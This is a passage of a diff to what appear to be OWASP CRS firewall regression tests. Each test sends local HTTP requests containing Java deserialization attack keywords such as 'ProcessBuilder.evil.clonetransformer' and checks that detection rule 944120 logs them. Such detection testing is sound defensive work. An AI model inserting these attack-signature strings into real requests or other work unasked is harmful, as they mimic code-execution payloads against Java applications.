"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 6 desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-15 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-16 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-17 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-18 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": 